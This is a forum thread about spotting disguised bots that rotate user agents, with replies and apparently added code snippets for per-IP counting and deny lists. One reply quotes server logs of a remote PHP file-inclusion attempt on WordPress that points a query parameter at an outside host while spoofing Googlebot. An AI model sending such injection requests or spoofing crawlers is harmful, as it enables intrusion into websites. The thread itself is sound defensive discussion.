Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help.

#1 (permalink)
05-12-2008, 01:48 PM
wige
WebProWorld Moderator
Join Date: Jun 2006
Location: United States
Posts: 2,648
Deluge of the bots

Last Thursday, I developed and implemented a new logging system that aims to identify which products on my site are the most popular. The system is designed to be robust enough both to display a live list of popular products to visitors and to show customized recommendations to users based on their browsing history. I designed it to record not only the product viewed but also the user's IP address and user agent, and to record everything so I could get the largest possible data set to test the system with.
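A minimal sketch of what such a log could look like, using Python's built-in sqlite3 module purely for illustration. The table name pageviews and the columns IP, useragent and productID are borrowed from the query quoted further down the thread; the viewed_at column, the helper names and the product ID 42 are assumptions, not the poster's actual schema.

```python
import sqlite3
from datetime import datetime, timezone


def create_log(conn):
    """Create the page-view log table if it does not exist yet."""
    conn.execute(
        """CREATE TABLE IF NOT EXISTS pageviews (
               productID INTEGER NOT NULL,
               IP        TEXT    NOT NULL,
               useragent TEXT    NOT NULL,
               viewed_at TEXT    NOT NULL   -- assumed column name
           )"""
    )


def log_view(conn, product_id, ip, useragent, viewed_at=None):
    """Record one product view; defaults to the current UTC time."""
    if viewed_at is None:
        viewed_at = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    conn.execute(
        "INSERT INTO pageviews (productID, IP, useragent, viewed_at) "
        "VALUES (?, ?, ?, ?)",
        (product_id, ip, useragent, viewed_at),
    )


conn = sqlite3.connect(":memory:")
create_log(conn)
# Product ID 42 is a made-up value; the IP, agent and time are from the log below.
log_view(
    conn,
    42,
    "220.95.108.239",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
    "2008-05-09 08:31:45",
)
```

Recording every hit unfiltered, as described, keeps the raw evidence available so that filtering rules can be tuned afterwards.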

I came in today and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots that I probably would never have found if not for the filters I added to this system. The following is from one such bot:

Timestamp            IP              User agent
2008-05-09 08:24:08  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
2008-05-09 08:31:45  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
2008-05-09 08:38:27  220.95.108.239  Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site)
2008-05-09 08:44:52  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2008-05-09 08:55:01  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
2008-05-09 09:23:43  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5
2008-05-09 09:31:08  220.95.108.239  Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
2008-05-09 09:36:59  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
2008-05-09 09:43:15  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
2008-05-09 09:48:44  220.95.108.239  Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
2008-05-09 09:56:14  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
2008-05-09 09:59:23  220.95.108.239  Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
2008-05-09 10:02:03  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
2008-05-09 10:04:41  220.95.108.239  Googlebot/2.1 (+How Google crawls my site)

Of course, this is only the traffic from that one bot, on one product page. There are hits from literally hundreds of similar bots on the same page, and this is spread across thousands of product pages.

Is there a way to filter these bad bots out programmatically? Even an SQL query that spots the bots with reasonable reliability would help, so that I can list them, remove them from the popularity system, and add them to my deny list.
__________________
The best way to learn anything, is to question everything.

#2 (permalink)
05-12-2008, 04:28 PM
incrediblehelp
WebProWorld 1,000+ Club
WebProWorld MVP
Join Date: Jan 2004
Location: Live in Cincy Now
Posts: 7,573
Re: Deluge of the bots

Why not filter by IP?

#3 (permalink)
05-12-2008, 05:18 PM
Tech Manager
WebProWorld Pro
Join Date: Jan 2008
Posts: 294
Re: Deluge of the bots

It doesn't look like a normal bot; it looks more like a malicious one. I've been seeing a lot of these lately. My suggestion is to capture the IP and user agent, store the incoming data, and then query it by IP address and user agent. If more than two user agents appear for the same IP, add that IP to your deny list.
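As a rough illustration of that rule, here is a small Python sketch that groups logged hits by IP and flags any address seen with more than two distinct user agents. The function name, the max_agents parameter and the 192.0.2.10 address (a reserved documentation address standing in for an ordinary visitor) are made up for the example; the other values are taken from the log in the first post.

```python
from collections import defaultdict


def suspicious_ips(hits, max_agents=2):
    """Return the IPs that presented more than max_agents distinct user agents.

    hits is an iterable of (ip, useragent) pairs.
    """
    agents_by_ip = defaultdict(set)
    for ip, useragent in hits:
        agents_by_ip[ip].add(useragent)
    return sorted(
        ip for ip, agents in agents_by_ip.items() if len(agents) > max_agents
    )


hits = [
    ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"),
    ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"),
    ("220.95.108.239", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; "
                       "rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"),
    # Hypothetical ordinary visitor with a single user agent.
    ("192.0.2.10", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"),
]

print(suspicious_ips(hits))  # ['220.95.108.239']
```

Counting distinct agents with a set means repeated views with the same browser never push an IP over the limit.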
__________________
I use Country IP Blocks as added security for my networks and servers.

#4 (permalink)
05-12-2008, 05:28 PM
wige
WebProWorld Moderator
Join Date: Jun 2006
Location: United States
Posts: 2,648
Re: Deluge of the bots

Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query

    SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) AS Products
    FROM pageviews
    GROUP BY IP
    ORDER BY Agents DESC;

gives me the following table:

IP               Agents  Products
117.102.128.221  9       1
77.127.155.176   9       1
125.204.58.200   8       1
190.50.125.136   8       1
216.198.139.38   8       1
220.95.108.239   8       1
66.63.219.212    8       1
87.205.215.237   8       1
89.3.18.208      8       1
79.177.161.75    7       1
85.180.253.111   7       1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX. Also, if a user upgrades their browser, or has multiple computers on a home network, they could have more than one user agent logged per IP, and I would not want an automated process to block legitimate traffic as a result of that.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
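One way to explore where to draw the line is to look at how many IPs fall at each distinct-agent count before committing to a cutoff. The sketch below does that against an in-memory SQLite copy of the pageviews table. The sample rows, the 192.0.2.x addresses, the agent-N strings and both function names are invented for illustration, and the HAVING threshold is a parameter to experiment with rather than a recommended value.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pageviews (IP TEXT, useragent TEXT, productID INTEGER)")

# Made-up sample: one IP cycling through 9 agents, the rest looking ordinary.
sample = {"192.0.2.1": 9, "192.0.2.2": 2, "192.0.2.3": 1, "192.0.2.4": 1}
for ip, n_agents in sample.items():
    for i in range(n_agents):
        conn.execute(
            "INSERT INTO pageviews VALUES (?, ?, ?)", (ip, f"agent-{i}", 1)
        )


def agent_histogram(conn):
    """Return (distinct agent count, number of IPs with that count) rows."""
    return conn.execute(
        """SELECT Agents, COUNT(*) AS IPs
           FROM (SELECT IP, COUNT(DISTINCT useragent) AS Agents
                 FROM pageviews
                 GROUP BY IP) AS per_ip
           GROUP BY Agents
           ORDER BY Agents DESC"""
    ).fetchall()


def ips_with_at_least(conn, min_agents):
    """Return (IP, distinct agent count) rows at or above the threshold."""
    return conn.execute(
        """SELECT IP, COUNT(DISTINCT useragent) AS Agents
           FROM pageviews
           GROUP BY IP
           HAVING COUNT(DISTINCT useragent) >= ?
           ORDER BY Agents DESC, IP""",
        (min_agents,),
    ).fetchall()


print(agent_histogram(conn))       # [(9, 1), (2, 1), (1, 2)]
print(ips_with_at_least(conn, 3))  # [('192.0.2.1', 9)]
```

If real data shows a clear gap between the bulk of visitors at one or two agents and a cluster at seven or more, a threshold anywhere inside that gap would leave upgraded browsers and multi-computer households alone.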
__________________
The best way to learn anything, is to question everything.

Last edited by wige; 05-12-2008 at 05:32 PM.

#5 (permalink)
05-12-2008, 05:43 PM
Tech Manager
WebProWorld Pro
Join Date: Jan 2008
Posts: 294
Re: Deluge of the bots

Let me give you an example of malicious activity from a likely botnet (most likely infected systems). The following shows a single IP address presenting multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious URL can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be Googlebot, but it quickly becomes apparent that it is not. It is evidently trying to bypass traditional filters that rely on fixed criteria. In this case it attempts to cloak its identity by changing the platform and user agent. That in itself is a signature of undesirable traffic.
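A separate check that does not depend on the user agent string at all is the reverse-then-forward DNS lookup Google documents for verifying its crawler: the IP should resolve to a host under googlebot.com or google.com, and that host should resolve back to the same IP. The Python sketch below is an illustration of that idea, not something used in this thread. The function name, the injectable resolver parameters and the stub data at the bottom are assumptions added so the example runs without network access.

```python
import socket


def is_real_googlebot(ip, reverse=socket.gethostbyaddr,
                      forward=socket.gethostbyname_ex):
    """Check a claimed Googlebot IP with a reverse and a forward DNS lookup."""
    try:
        hostname = reverse(ip)[0]          # PTR lookup: IP -> host name
    except OSError:
        return False                       # no reverse record at all
    if not hostname.endswith((".googlebot.com", ".google.com")):
        return False
    try:
        addresses = forward(hostname)[2]   # A lookup: host name -> IPs
    except OSError:
        return False
    return ip in addresses                 # must map back to the same IP


# Stub resolvers with invented data, so the demo needs no network.
def stub_reverse(ip):
    if ip == "192.0.2.1":
        return ("crawler.example.googlebot.com", [], [ip])
    raise OSError("no PTR record")


def stub_forward(hostname):
    return (hostname, [], ["192.0.2.1"])


print(is_real_googlebot("192.0.2.1", stub_reverse, stub_forward))       # True
print(is_real_googlebot("220.95.108.239", stub_reverse, stub_forward))  # False
```

With the default arguments the function performs live DNS lookups, so in practice the result would be cached per IP rather than computed on every request.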

In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables.
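The injection attempt itself is easy to spot mechanically, since each request carries a full URL as the value of a query parameter. Here is a hedged Python sketch of that one check; the function name and the example.invalid host are made up, and a real filter would likely combine this with the IP and user agent signals described above.

```python
from urllib.parse import parse_qsl, urlsplit


def has_remote_url_param(request_target):
    """Return True if any query parameter value looks like a remote URL.

    request_target is the path-plus-query part of the request line,
    for example "/?p=123".
    """
    query = urlsplit(request_target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value at this point.
        if value.lower().startswith(("http://", "https://", "ftp://")):
            return True
    return False


print(has_remote_url_param("/?p=http://example.invalid/images?"))    # True
print(has_remote_url_param("/?p=http%3A%2F%2Fexample.invalid%2Fx"))  # True
print(has_remote_url_param("/?p=123"))                               # False
```

Because the values are decoded before the comparison, a percent-encoded URL is caught as well as a plain one.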

In your case I think it is best to contain the IP address once it shows more than two changes of platform or user agent. You could also add a time element and use it as the deciding factor alongside the first two.
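To sketch how the time element might work: instead of counting distinct user agents over the whole log, count them inside a sliding window, so that a browser upgrade weeks apart does not look like agent cycling. The Python below is one possible reading of that suggestion. The one-hour window, the function name and the 192.0.2.10 visitor with its dates are assumptions; the four 220.95.108.239 rows come from the log in the first post.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def max_agents_in_window(hits, window=timedelta(hours=1)):
    """Map each IP to the most distinct user agents seen within any window.

    hits is an iterable of (ip, useragent, "YYYY-MM-DD HH:MM:SS") tuples.
    """
    by_ip = defaultdict(list)
    for ip, useragent, timestamp in hits:
        when = datetime.strptime(timestamp, "%Y-%m-%d %H:%M:%S")
        by_ip[ip].append((when, useragent))

    result = {}
    for ip, entries in by_ip.items():
        entries.sort()
        best = 0
        # Try a window starting at each hit and count the agents inside it.
        for i, (start, _) in enumerate(entries):
            seen = {ua for when, ua in entries[i:] if when - start <= window}
            best = max(best, len(seen))
        result[ip] = best
    return result


hits = [
    ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; "
                       "Win 9x 4.90; H010818; AT&T CSM6.0)", "2008-05-09 08:24:08"),
    ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
     "2008-05-09 08:31:45"),
    ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
     "2008-05-09 08:44:52"),
    ("220.95.108.239", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; "
                       "rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4",
     "2008-05-09 08:55:01"),
    # Hypothetical visitor who switched browsers a week apart.
    ("192.0.2.10", "browser-old", "2008-05-01 10:00:00"),
    ("192.0.2.10", "browser-new", "2008-05-08 10:00:00"),
]

print(max_agents_in_window(hits))  # {'220.95.108.239': 4, '192.0.2.10': 1}
```

The nested loop is quadratic per IP, which is fine for a sketch but would want a proper two-pointer window on a large log.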
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 05:57 PM.

#6 (permalink)
05-12-2008, 05:55 PM
wige
WebProWorld Moderator
Join Date: Jun 2006
Location: United States
Posts: 2,648
Re: Deluge of the bots

Cool. My log does look quite similar to yours, so it is probably a similar system to what I am encountering. I guess the final part of this would be, is there a way I can specify a text file for Apache to use as a deny list that can be regularly updated without restarting the server?
__________________
The best way to learn anything, is to question everything.

#7 (permalink)
05-12-2008, 06:00 PM
Tech Manager
WebProWorld Pro
Join Date: Jan 2008
Posts: 294
Re: Deluge of the bots

You could use a text file, but I suggest a database solution. Establish the acceptable criteria and then redirect traffic that doesn't meet those criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP. You could even append a message to the redirect if you so choose.

Then you could add problematic IPs to your .htaccess file at a later date. But the database solution will be quicker and will probably use fewer resources than loading the .htaccess file each time.
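A rough sketch of both halves of that idea in Python with SQLite: a lookup that application code could run per request, and an export that turns the same list into .htaccess lines for later. The denylist table, the function names and the use of SQLite are assumptions for illustration. The emitted directives use the Order/Allow/Deny syntax of Apache 2.2; Apache 2.4 expresses the same thing with Require directives instead.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE denylist (IP TEXT PRIMARY KEY)")  # hypothetical table

# The two bot addresses shown in this thread.
for ip in ("220.95.108.239", "80.230.118.211"):
    conn.execute("INSERT OR IGNORE INTO denylist (IP) VALUES (?)", (ip,))


def is_denied(conn, ip):
    """Return True if the IP is currently on the deny list."""
    row = conn.execute("SELECT 1 FROM denylist WHERE IP = ?", (ip,)).fetchone()
    return row is not None


def htaccess_lines(conn):
    """Render the deny list as Apache 2.2 style access-control lines."""
    ips = [row[0] for row in conn.execute("SELECT IP FROM denylist ORDER BY IP")]
    # With "Order Allow,Deny", a client matching both rules is denied.
    return ["Order Allow,Deny", "Allow from all"] + [f"Deny from {ip}" for ip in ips]


print(is_denied(conn, "80.230.118.211"))  # True
print("\n".join(htaccess_lines(conn)))
```

Keeping the list in one table means the live check and the exported file cannot drift apart, since the file is only ever generated from the table.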
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 06:06 PM.

All times are GMT -4.